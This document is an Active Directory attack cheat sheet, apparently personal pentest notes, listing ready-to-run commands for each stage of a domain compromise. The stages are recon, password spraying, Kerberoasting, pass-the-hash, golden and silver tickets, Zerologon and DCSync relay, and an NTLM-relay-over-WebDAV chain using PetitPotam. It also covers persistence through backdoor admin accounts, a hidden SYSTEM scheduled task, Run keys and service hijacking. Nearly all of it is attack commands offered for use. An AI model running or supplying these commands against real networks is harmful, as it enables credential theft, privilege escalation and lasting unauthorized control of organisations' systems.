
                ---------------------------
                ------ AD CHEATSHEET ------
                ---------------------------

***********
** RECON **
***********

    $ ldapsearch -x -H ldap://dc01.corp.com -s base -LLL

        get domain, forest, DC version with following table:

    Value   Forest          Domain              Domain Controller
    0       2000            2000 Mixed/native   2000
    1       2003 Interim    2003 Interim        N/A
    2       2003            2003                2003
    3       2008            2008                2008
    4       2008 R2         2008 R2             2008 R2
    5       2012            2012                2012
    6       2012 R2         2012 R2             2012 R2
    7       2016            2016                2016

    $ nslookup -type=SRV _kerberos._tcp.corp.com
        get DCs

    $ certipy find 'corp.com/user:P4ssw0rd@dc01.corp.com'
        get root CAs

    $ nslookup corp.com
        get DNS servers

    $ cme smb 10.10.10.0/24 -u user -p P4ssw0rd -d corp.com --shares
        search for network shares with CrackMapExec

    PS C:\> Get-ADDefaultDomainPasswordPolicy
        get domain password policy

    PS C:\> Get-ADObject -LDAPFilter "(|(ObjectClass=user)(ObjectClass=computer))" -SearchBase "DC=MEDIC,DC=EX" -Property * |  where description -ne $null | Select Name, Description, ObjectClass
        get user and computer account with a non void description

****************
** SHARPHOUND **
****************

    Collectors:

    PS > runas /netonly /user:corp.com\user powershell

    check that account is logged on with

    PS > net view \\corp.com

    then

    PS > .\SharpHound.exe -d corp.com --domaincontroller domaincontroller.corp.com

***************
** RESPONDER **
***************

    in case you are on a machine with no internet connexion and need to setup a responder
    you need python3-netifaces (ex https://packages.debian.org/stretch/amd64/python3-netifaces/download)

**************
** PASSWORD **
**************

    $ sprayhound -U ./users.txt -p Corpcom1 -d corp.com -dc 10.10.10.2
        test password Medicex1 with every users in users.txt

    In case we have a domain account:
    $ sprayhound -p Corp2022 -d corp.com -dc 10.10.10.2 -lu user -lp P4ssw0rd
        let sprayhound search for users, and test password if the user account won't be blocked at next password failure

    Test user as password:
    $ sprayhound -U ./users.txt -d corp.com -dc 10.10.10.2
    $ sprayhound -d corp.com -dc 10.10.10.2 -lu user -lp P4ssw0rd
        
******************************
** FIRST ACCOUNT COMPROMISE **
******************************

    - Network attack (responder, ...)
    - Kerberoasting, password spraying, ...
    - Application compromised

****************
** NTLM RELAY **
****************

    $ ntlmrelayx.py -t 10.10.10.2 -smb2support
        10.10.10.2 is the server we want to authenticate to

*******************
** KERBEROASTING **
*******************

    $ GetUserSPNs.py -request corp.com/user:P4ssw0rd -outputfile hashes.kerberoast
        Search for kerberoastable accounts (services run by user accounts and not computer accounts)

    $ hashcat -m 13100 ./hashes.kerberoast /path/to/wordlist.txt
        Try to break hashes

*******************
** PASS THE HASH **
*******************

    $ wmiexec.py $domain/Administrator@$domain_controller_1 -hashes :$nthash

    $ cme smb 10.10.10.0/24 -u user -p P4ssw0rd -d medic.ex --sam
        use CrackMapExec to try to authenticate with "user" on every computer in network range
            -> try with the user/password of the local admin of a computer once compromised

        RDP PTH
    try
    $ xfreerdp /v:10.0.0.200 /u:Administrator /pth:8846F7EAEE8FB117AD06BDD830B7586C

    in case there is an error like "Account Restrictions are preventing this user from signing in.", it
    is probably because Restricted mode is disabled. You can enable it with the administrator privilege
    $ cme smb 10.0.0.200 -u Administrator -H 8846F7EAEE8FB117AD06BDD830B7586C -x 'reg add HKLM\System\CurrentControlSet\Control\Lsa /t REG_DWORD /v DisableRestrictedAdmin /d 0x0 /f'



*******************
** GOLDEN TICKET **
*******************

    https://yojimbosecurity.ninja/golden-ticket-with-impacket/

    get domain SID:
    lookupsid.py user:passwd@hostname with a user:passwd and a hostname already compromised in domain

    then build ticket
    ticketer.py -nthash [krbtgt_nthash] -domain-sid [domain_sid] -domain [domain_fqdn] random_name
    and use it:
    export KRB5CCNAME=~/baduser.ccache; psexec.py -dc-ip [DC_IP] -target-ip [DC_IP] -no-pass -k [domain_fqdn]/random_user@[DC_FQDN]

    or with mimikatz:

    /kerberos::golden /domain:[domain_fqdn] /user:random_user /sid:[domain_sid] /krbtgt:[nthash] /ptt

***************
** ZEROLOGON **
***************

    identify if host is vuln:
    lsadump::Zerologon /target:[TARGET] /account:[TARGET] /null /ntlm

    Standard method using mimikatz:

    lsadump::Zerologon /target:[TARGET] /account:[TARGET] /null /ntlm /exploit

    Alternative method
    https://dirkjanm.io/a-different-way-of-abusing-zerologon/
    https://www.thehacker.recipes/ad/movement/mitm-and-coerced-authentications/ms-rprn
    https://www.thehacker.recipes/ad/movement/netlogon/zerologon

    check if service print spooler is remotely accessible on $TARGET
    $ rpcdump.py $TARGET | grep -A 6 "spoolsv"

    then
    $ ntlmrelayx -t dcsync://$domain_controller_2 -smb2support

    and
    $ dementor.py -d $domain -u $user -p $password $attacker_ip $domain_controller_1

    $domain_controller_1 being a machine with domain admin access (not necesseraly a DC)
    $domain_controller_2 being the actual DC you wish to DCSynchost

    pass the hash of the Administrator account
    $ wmiexec.py $domain/Administrator@$domain_controller_1 -hashes :$nthash

*****************
** PERSISTANCE **
*****************

    Local User
    PS > net user evil p4ssw0rd /add
    PS > net localgroup Administrators evil /add

    Domain User
    PS > net user evil p4ssw0rd /add /domain
    PS > net group "Domain Admins" evil /add

    Scheduled task
    schtasks /create /tn EvilTask /tr "c:\windows\syswow64\WindowsPowerShell\v1.0\powershell.exe -WindowStyle hidden -NoLogo -NonInteractive -ep bypass -nop -c 'net user evil p4ssw0rd /add; net localgroup Administrators evil /add'" /sc onlogon /ru System

    RUN keys
    reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run" /v VeryEvil /t REG_SZ /d "C:\Windows\Temp\OC.exe"

    Service modification
    sc config AxInstSV binPath= "C:\Windows\Temp\OC.exe" start= auto

    Modifiy domain admins group to give us right to add a member to it
        -> go to "Security" tab and add the "Write" right to our user

    Silver ticket
    $ lookupsid.py corp.com/user:P4ssw0rd@dc01.corp.com
    [...]
    [*] Domain SID is: S-1-5-21-3526105896-714836913-1342931244
    [...]
    $ ticketer.py -nthash <service account hash> -domain-sid S-1-5-21-3526105896-714836913-1342931244 -domain corp.com -spn CIFS/SRV01.corp.com administrator

    Golden ticket
    $ lookupsid.py corp.com/user:P4ssw0rd@dc01.corp.com
    [...]
    [*] Domain SID is: S-1-5-21-3526105896-714836913-1342931244
    [...]
    $ ticketer.py -nthash <krbtgt account hash> -domain-sid S-1-5-21-3526105896-714836913-1342931244 -domain corp.com administrator


*********
** RDP **
*********

    Use FreeRDP to RDP using only the NT hash (and no password)
    $ freerdp /u:user /d:corp.com /pth:ac1dbef8523bafece1428e067c1b114f /v:dc01.corp.com

    Enable RDP remotely:

    first
    - run: regedit.exe
    - file > connect network registry
    - specify hostname/ip
    - go to HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server
    - change fDenyTSConnections parameter from 1 to 0
    then
    - with psexec or wmiexec or whatever:
    > reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
    more info: https://theitbros.com/how-to-remotely-enable-remote-desktop-using-powershell/

*********************
** NETWORK CAPTURE **
*********************

    $ netsh trace start capture=yes IPv4.Address=192.168.122.2
    $ netsh trace stop

    Then use etl2pcapng to convert from etl to pcapng
    $ .\etl2pcapng.exe in.etl out.pcapng

**********
** MISC **
**********

    SAM base contains username and password hashes of LOCAL USERS (NT hash)

    CMD Shell via SMB
    $ psexec.py corp.com/user:P4ssw0rd@dc01.corp.com
    if the latter didn't work try with wmiexec
    $ wmiexec.py corp.com/user:P4ssw0rd@dc01.corp.com

****************
** NTLM RELAY **
****************

    -> NTLM RELAY is a range of attacks, here is an example using the Webdav client
    https://www.thehacker.recipes/ad/movement/ntlm/relay

    NTLM RELAY via WEBDAV
    conditions:
        - webdav client actived -> it is by default on windows workstation, not servers
        - LDAP signing, channel binding must be disabled (it is by default)
    -> at the end of the attack, we will have a local admin account on a workstation on our choice (that have webdav client activated)

    High level steps:
        Add a DNS entry on the Domain Controller
        Coerce a WebDav authentication from the victim workstation toward our attacker machine (using PetitPotam or PrinterBug)
        Relay the authentication toward the Domain Controller via LDAP

        See https://www.thehacker.recipes/ad/movement/ntlm/relay to know which protocols we can use for the attack

    Actual steps:
        - List DNS zones with dnstools
            $ python3 ~/tools/krbrelayx/dnstool.py -u "$domain\$user' -p $passwd --print-zone $dns_target_ip // $dns_target_ip is domain controller ip
        - Add a DNS entry
            $ python3 ~/tools/krbrelayx/dnstool.py -u "$domain\$user' -p $passwd -r $tdns -a add -d $lip $dnstip 
            // sometimes the --legacy can be useful. The --zone $zone may be used to specify a zone retrieved during the previous step
        - Verify if WebDAV  is activated on the target victim workstation
            $ cme smb $target_ip -u $user -p $passwd -M webdav
        - Verify on the DC that LDAP is not secure: LDAP signing and channel binding are disabled (the tool is not good, TODO: search for a better one like a nmap script, but must be authenticated)
            $ python3 ~/tools/LdapRelayScan/LdapRelayScan.py -dc-ip $dc_ip -u $user -p $passwd
        - The attack use the fact that by default, an "authenticated user" can add up to 10 computer accounts on the domain. We will see if we are in the limit by testing the attack
        - Use PetitPotam or PrinterBug like the following
        - Launch ntlmrelayx
            $ sudo ~/tools/krbrelayx/ntlmrelayx.py -t ldaps://$dc_ip --http-port 8080 --delegate-access --no-dump --no-smb-server 
        - Launch PetitPotam or PrinterBug
            $ python3 ~/tools/PetitPotam/PetitPotam.py -u $user -p $passwd -d $netbios_domain_name $ipToRelay $dc_ip
        - An account will be created on the Active Directory. Take note of the credentials, and use to create a kerberos ticket to authenticate on the victim workstation
          I did not understand this step fully.
            $ getST.py -spn "cifs/$FQDN" -impersonate $userImpers -dc-ip $dc_ip "$domain/$user:$passwd" 
            // $userImpers will usually be Administrator (local admin on victim workstation)
            // $FQDN is the victim workstation fqdn
            // $user and $passwd are the ones created by ntlmrelayx.py previously
            $ export KRB5CCNAME=./Administrateur.ccache // this is the ticket created by getST.py
            $ smbexec.py -k -no-pass "$domain/$userImpers@$domain_controller" -share ADMIN$
